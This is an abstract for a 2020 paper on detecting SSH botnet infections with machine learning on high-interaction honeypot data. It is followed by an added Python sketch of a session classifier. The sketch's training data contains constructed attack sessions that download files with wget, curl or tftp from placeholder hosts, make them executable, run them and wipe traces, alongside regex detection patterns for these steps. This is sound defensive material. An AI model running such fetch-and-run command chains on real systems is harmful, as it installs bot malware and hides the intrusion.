A novel Machine Learning-based approach for the detection of SSH botnet infection
Future Generation Computer Systems (IF 7.5) Pub Date: 2020-09-09, DOI: 10.1016/j.future.2020.09.004
José Tomás Martínez Garre , Manuel Gil Pérez , Antonio Ruiz-Martínez

Botnets are causing severe damage to users, companies, and governments through information theft, abuse of online services, DDoS attacks, etc. Although significant research is being conducted to detect them and mitigate their effects, they are increasing exponentially due to new zero-day attacks, variations in their behavior, and obfuscation techniques. High Interaction Honeypots (HIH) are the only honeypots able to capture attacks and log all the information generated by attackers when setting up a botnet. The data generated is being processed using Machine Learning (ML) techniques for detection, since they can detect hidden patterns. However, so far, research has focused on the intermediate phases of the botnet's life cycle, during operation, underestimating the initial infection phase. To the best of our knowledge, this is the first solution targeting the infection phase of SSH-based botnets. Therefore, we have designed an approach based on an SSH-based HIH to generate a dataset consisting of executed commands and network information. Herein, we have applied ML techniques to develop a real-time detection model. This approach reached a very high level of prediction and zero false negatives. Indeed, our system detected all known and unknown SSH sessions intended to infect our honeypots. Thus, our research has demonstrated that new SSH infections can be detected through ML techniques.
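As an added illustration (not code from the paper or its authors), the block below sketches the shape of the pipeline the abstract describes: an SSH honeypot session, recorded as the commands it executed plus network metadata, is turned into a feature vector and scored by a trained classifier, and the same scoring function can be called on a session that is still open, which is what makes the detection real-time. The feature set, the constructed sample sessions (hosts are TEST-NET-3 placeholders), and the from-scratch logistic regression are assumptions chosen for this example; the paper's own dataset, features, and model are not reproduced here.

```python
"""
Toy SSH-honeypot session classifier (added example, not the paper's code).
Pipeline: session log -> feature vector -> trained classifier -> verdict.
"""
import math
import re

# Behavioural markers often present in infection sessions. Assumed feature set
# for this example; the paper's features are not reproduced.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\b")
EXEC_RE = re.compile(r"(?:^|[;&|\s])\./\S+|\b(?:sh|bash|nohup)\s+\S+")
CLEANUP_RE = re.compile(r"\brm\s+-rf\b|\bhistory\s+-c\b|\bunset\s+HISTFILE\b")


def extract_features(commands, duration_s):
    """Map one session (executed commands + duration taken from the network
    metadata) to a fixed-length feature vector with every value in [0, 1].
    Regexes are evaluated per command so tokens never bleed across lines."""
    n = len(commands)
    flag = lambda rx: 1.0 if any(rx.search(c) for c in commands) else 0.0
    return [
        min(n / 10.0, 1.0),                  # command volume
        flag(DOWNLOAD_RE),                   # fetches a payload
        flag(CHMOD_RE),                      # makes something executable
        flag(EXEC_RE),                       # runs a local file
        flag(CLEANUP_RE),                    # anti-forensics
        min(n / max(duration_s, 1.0), 1.0),  # commands/second: scripted vs. interactive
    ]


# Constructed, labelled sample sessions: (commands, duration in seconds, label);
# label 1 = infection attempt, 0 = non-infecting session.
TRAINING_SESSIONS = [
    (["cd /tmp", "wget http://203.0.113.10/bot.sh", "chmod 777 bot.sh", "sh bot.sh", "rm -rf bot.sh"], 3, 1),
    (["cd /var/tmp", "curl -O http://203.0.113.11/x86", "chmod +x x86", "./x86", "history -c"], 2, 1),
    (["uname -m", "cd /tmp", "wget http://203.0.113.12/a.sh", "chmod +x a.sh", "nohup ./a.sh &"], 4, 1),
    (["cd /dev/shm", "tftp -g -r mips 203.0.113.13", "chmod +x mips", "./mips"], 2, 1),
    (["uname -a", "w", "ls -la", "exit"], 45, 0),
    (["cat /proc/cpuinfo", "free -m", "df -h", "uptime", "exit"], 120, 0),
    (["id", "ls", "exit"], 30, 0),
    (["uname -a", "cat /etc/os-release", "exit"], 60, 0),
]


def sigmoid(z):
    z = max(min(z, 60.0), -60.0)  # guard against exp overflow
    return 1.0 / (1.0 + math.exp(-z))


def train(sessions, lr=1.0, epochs=3000):
    """Logistic regression fitted by batch gradient descent; returns (weights, bias)."""
    data = [(extract_features(c, d), y) for c, d, y in sessions]
    dim, n = len(data[0][0]), len(data)
    w, b = [0.0] * dim, 0.0
    for _ in range(epochs):
        gw, gb = [0.0] * dim, 0.0
        for x, y in data:
            err = sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b) - y
            for i in range(dim):
                gw[i] += err * x[i]
            gb += err
        w = [wi - lr * gi / n for wi, gi in zip(w, gw)]
        b -= lr * gb / n
    return w, b


MODEL = train(TRAINING_SESSIONS)


def classify(commands, duration_s, model=MODEL, threshold=0.5):
    """Score a finished or still-open session; returns (label, probability)."""
    w, b = model
    x = extract_features(commands, duration_s)
    p = sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)
    return (1 if p >= threshold else 0), p


def training_accuracy(sessions=TRAINING_SESSIONS, model=MODEL):
    hits = sum(classify(c, d, model)[0] == y for c, d, y in sessions)
    return hits / len(sessions)


if __name__ == "__main__":
    print("training accuracy:", training_accuracy())
    # Real-time use: re-score an unseen session after every command it issues.
    live = ["cd /tmp", "wget http://203.0.113.5/x86", "chmod +x x86", "./x86", "rm -rf x86"]
    for k in range(1, len(live) + 1):
        label, p = classify(live[:k], duration_s=0.4 * k)
        print(f"after {k} command(s): label={label} p={p:.3f}")
```

In a deployment the feature vector would be rebuilt from the honeypot's event stream as each command arrives, so the verdict is available while the attacker is still connected rather than only at session end; the threshold is the knob that trades earliness against false positives on interactive sessions.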

Updated: 2020-10-04